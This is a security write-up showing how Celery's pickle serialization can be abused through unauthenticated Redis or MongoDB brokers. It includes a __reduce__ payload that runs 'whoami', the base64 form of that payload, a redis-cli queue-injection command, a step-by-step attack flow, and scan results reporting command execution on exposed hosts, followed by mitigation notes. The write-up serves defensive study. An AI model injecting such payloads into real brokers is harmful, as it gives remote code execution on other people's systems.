Exploiting Message Queue Injection to Hijack Distributed Nodes with Celery

Overview

Message‑queue middleware (e.g., RabbitMQ, ActiveMQ, Kafka, Redis) is widely used to decouple components in distributed systems. Because messages are serialized, transmitted, and deserialized across all nodes, any flaw in the serialization path can compromise the entire cluster.

Serialization Vulnerabilities

Many languages expose dangerous magic methods during deserialization: Python __reduce__(), PHP __wakeup(), Java RMI, etc. If a broker uses the language’s native serializer, an attacker who can modify the payload can trigger arbitrary code execution on the consumer.

Celery and the Default Pickle Serializer

Celery (Python) used pickle as the default serializer before version 4.0.0. The following minimal example shows how pickle works:

# serializer.py
import pickle, base64
class MyObj:
    def __init__(self, data):
        self.data = data
obj = MyObj('secret')
payload = base64.b64encode(pickle.dumps(obj))
print(payload)

Deserialization without the class definition raises NameError:

# unserializer.py
import pickle, base64
payload = b'...'
obj = pickle.loads(base64.b64decode(payload))

Defining __reduce__() allows execution of arbitrary code during unpickling:

class MyObj:
    def __reduce__(self):
        import os
        return (os.system, ('whoami',))

Serializing this object produces a base64 payload that runs os.system('whoami') when unpickled. Example payload (base64):

Y3Bvc2l4CnN5c3RlbQpwMAooUyd3aG9hbWknCnAxCnRwMgpScDMKLg==

Celery Task Submission and Broker Interaction

When Redis is used as the broker, Celery stores each task as a JSON object. Important fields:

properties.body_encoding = 'base64'

content-type = 'application/x-python-serialize'

The body field contains the base64‑encoded pickle data. Redis keys used by Celery include: celery – default task queue. _kombu.binding.celery – routing metadata.

Injecting a Malicious Message

Replace the body value with the malicious payload and push the JSON into the celery key. Example command:

redis-cli -h 192.168.99.100 set celery "{...payload...}"

End‑to‑End Attack Flow

Identify a Celery deployment that uses an unauthenticated Redis or MongoDB broker.

Confirm the broker stores messages with pickle‑based serialization.

Craft a payload that executes the desired command via __reduce__.

Inject the payload into the broker’s queue.

The worker automatically deserializes the payload, triggering remote code execution.

Detecting Vulnerable Brokers

Scanning scripts look for characteristic keys/collections:

Redis keys: celery, _kombu.binding.*, unacked.* MongoDB collections: messages, messages.broadcast, messages.routing Internet‑wide scans found ~14,000 unauthenticated Redis instances, of which 86 matched the Celery pattern, and ~14,000 unauthenticated MongoDB instances, of which 22 matched. Follow‑up tests yielded 32 successful command‑execution callbacks from Redis targets and 3 from MongoDB targets.

Mitigation Notes

The exploit requires both an unauthenticated broker and Celery’s default pickle serializer. Hardening measures include:

Enforce authentication on Redis/MongoDB brokers.

Configure Celery to use a safe serializer (e.g., json, msgpack) instead of pickle.

Validate and sanitize message payloads before deserialization.